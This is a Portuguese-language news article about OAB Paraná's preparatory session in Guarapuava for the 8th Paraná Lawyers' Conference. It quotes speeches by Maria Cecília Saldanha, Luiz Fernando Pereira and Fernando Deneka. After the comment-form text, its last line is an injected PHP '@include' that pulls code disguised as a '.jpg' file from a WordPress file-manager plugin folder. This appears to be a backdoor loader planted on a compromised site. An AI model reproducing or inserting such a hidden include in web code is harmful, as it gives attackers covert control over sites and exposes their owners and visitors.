Guarapuava recebe quinta edição das preparatórias da Conferência da Advocacia

A preparatória de Guarapuava da 8ª Conferência da Advocacia Paranaense foi aberta nesta quinta-feira (24) na sede da subseção. O evento, que é o quinto neste modelo, reúne a advocacia de Irati, Pitanga, Prudentópolis e União da Vitória.  A presidente da subseção, Maria Cecília Saldanha, abriu os trabalhos.

“Quero parabenizar a OAB Paraná pela iniciativa, pela organização do evento. Quão significativo para nós é termos a advocacia regional reunida, tanto para o aprimoramento voltado ao nosso dia a dia do exercício profissional quanto para o debate de temas tão importantes, sobre os quais a advocacia tem pedido um espaço para falar, colocar seu posicionamento e lançar a sua voz”, disse a presidente da subseção, Maria Cecília Saldanha.

O presidente da Comissão Executiva da Conferência e diretor tesoureiro da seccional, Luiz Fernando Pereira, agradeceu a anfitriã que foi uma entusiasta da ideia de realizar as preparatórias desde o início.

“A primeira grande coragem da doutora Marilena ao realizar esses eventos é trazer a conferência para o interior. A segunda grande virada é transformar a nossa conferência em um conjunto de debates, para que os advogados falem, manifestem suas opiniões. Todo mundo terá direito de dar opinião e essa opinião será ouvida. É a nossa homenagem à Conferência de 1978, que foi a nossa grande inspiração”, explicou Pereira sobre a dinâmica do evento. “A carta de Curitiba não será escrita isoladamente por alguém e depois referendada, mas será construída coletivamente”, concluiu.

A presidente da seccional, Marilena Winter, agradeceu os cumprimentos e a acolhida e convidou o vice-presidente, Fernando Deneka, a falar em nome da diretoria da seccional.

“Estar aqui em Guarapuava, região mais central do estado, é uma simbologia do que a Ordem está fazendo com essa conferência, que tem como uma das grandes características dar voz à advocacia”, disse Deneka. “Estamos aqui para discutir o futuro da nossa profissão e do nosso país. Quem sabe essa conferência leve a voz da advocacia ao destaque mais uma vez, começando pelo que o Paraná tem a dizer. Somos advogados aguerridos, que trabalhamos, nos empenhamos, debatemos e discutimos. Vamos fazer a voz da advocacia ser forte e ser ouvida”, concluiu o vice-presidente da seccional.

O evento também foi prestigiado pelos presidentes das subseções de Prudentópolis, Alysson Wolski, de Irati, Mário Cézar Pianaro Angelo, e de União da Vitória, Omar Cador Ramos Eddine.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";